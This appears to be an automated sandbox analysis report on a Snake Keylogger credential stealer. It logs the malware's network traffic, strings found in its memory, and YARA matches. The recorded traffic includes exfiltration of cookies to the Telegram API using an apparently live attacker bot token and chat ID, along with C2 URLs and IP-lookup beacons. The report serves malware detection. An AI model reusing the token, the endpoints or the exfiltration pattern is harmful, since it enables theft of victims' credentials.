Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49683 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49687 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49690 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2009/03/2025%20/%2014:24:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2008/03/2025%20/%2017:19:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0/sendDocument?chat_id=5022382431&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5f9638252d94Host: api.telegram.orgContent-Length: 734

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 22:00:42 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 22:00:45 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002CAC000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: OtldpQxzAw.exe, 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: OtldpQxzAw.exe, 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: OtldpQxzAw.exe, 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002CAC000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: OtldpQxzAw.exe, 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: svchost.exe, 0000000F.00000002.2857824337.000002C68F6A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2856717060.000002C68F6A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.15.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.15.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.15.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.15.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.15.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.15.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.15.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: OtldpQxzAw.exe, 00000000.00000002.901255150.00000000028EB000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.952651140.0000000003220000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: OtldpQxzAw.exe, wiSeRRwvZHTk.exe.0.dr	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: OtldpQxzAw.exe, 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002CAC000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000032DC000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000031D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000032DC000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000031D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000031D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000031D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20a
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0/sendDocument?chat_id=5022
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: OtldpQxzAw.exe, 00000009.00000002.3312270921.0000000003DA2000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3312270921.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.000000000440B000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: OtldpQxzAw.exe, 00000009.00000002.3312270921.0000000003DA2000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3312270921.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.000000000440B000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.0000000003280000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en0
Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.0000000003280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.000000000327B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: OtldpQxzAw.exe, 00000009.00000002.3312270921.0000000003DA2000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3312270921.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.000000000440B000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: edb.log.15.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 0000000F.00000003.1203192613.000002C694E00000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.15.dr, edb.log.15.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002B7F000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.000000000313F000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000031D9000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000031AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: OtldpQxzAw.exe, 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.000000000313F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.0000000003169000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002B7F000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000031D9000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000031AF000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.0000000003169000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: OtldpQxzAw.exe, 00000009.00000002.3312270921.0000000003DA2000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3312270921.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.000000000440B000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20w
Source: OtldpQxzAw.exe, 00000009.00000002.3312270921.0000000003DA2000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3312270921.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.000000000440B000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.00000000043D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000032A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000032A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/0
Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000032AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49721 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
